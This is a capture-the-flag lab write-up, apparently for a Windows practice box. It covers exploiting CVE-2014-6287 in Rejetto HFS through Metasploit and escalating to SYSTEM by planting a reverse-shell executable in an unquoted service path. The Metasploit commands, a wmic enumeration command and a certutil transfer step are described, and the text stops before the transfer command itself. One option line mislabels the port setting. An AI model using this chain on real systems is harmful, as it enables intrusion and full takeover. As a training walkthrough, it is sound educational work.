This was an easy Windows box that involved gaining initial access through a remote command execution vulnerability in the Rejetto HTTP File Server web application and exploiting a unquoted service path vulnerability in the Advanced System Care 9 application to gain SYSTEM level access
Starting off with deploying the machine and quickly scanning the open ports with rustscan,
rustscan -a 10.10.240.220 — ulimit 5000
Rustscan result
We got the open ports and now we can scan them in detail using nmap,
Result scan shows that port 80 is running webserver, port 139,445 is running SMB service, port 5985 is running MS HTTPAPI service, port 8080 is running HttpFileServer service.
We landed on the page where we can see the picture of employee of the month. But after enumerating this website like looking at it’s source page, fuzzing it’s hidden directories, checking what technologies are there on this website, but I couldn’t find anything interesting.
CVE-2014–6287 : Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using ‘%00’ to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
There is also metasploit module for this exploit so I decided to first boot up the metasploit using msfconsole -q (neglecting the banner), and the search for the exploit,
search rejetto
There is a module. We can use this module to exploit the machine which is vulnerable to this service.
Let’s use this module,
use exploit/windows/http/rejetto_hfs_hxec
Let’s set the options:
set rhosts 10.10.240.220 set lhost tun0 set rhosts 8080
Running the exploit using run and we got a shell,
we got a meterpreter shell. Issuing getuid command and we got to know that we are STEELMOUNTAIN\bill user.
Okay, so now we got a meterpreter shell so we can drop into shell (which is cmd, default for windows) using shell command. Navigating to bill user desktop, we got the user flag,
Now, that we are done with getting foothold process on machine, we now have to perform Privilege Escalation and to achieve this, we have to enumerate the system first. So Let’s upload the winpeas executable on the target machine using,
Let’s run this executable using winpeas.exe and after scrolling down the result, we can see that there are Unquoted Service Paths and bill user has permissions to write data/ create files on the directory making it’s easy for bill user to escalate privileges to Administrator user,
Now question arises, What are Unquoted Service Path?
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.
Let’s try another command to confirm that there is Unquoted Service Path,
wmic service get name,displayname,pathname,startmode |findstr /i “auto” | findstr /i /v “C:\windows\\” |findstr /i /v “””
We can see that there is indeed an Unquoted Service Path and we can abuse this vulnerability to escalate our privilege to Administrator user by creating the file with same name as directory just before the service executable, Advanced.exe and windows will execute it first before even executing the original ASCService.exe and since our malicious file gets executed first, we will get a reverse shell.
Our payload is generated and now is the time to transfer this payload into C:\Program Files (x86)\IObit directory. To transfer executable on target machine, first start the python server using python3 -m http.server and now we can use certutil command to transfer the payload,
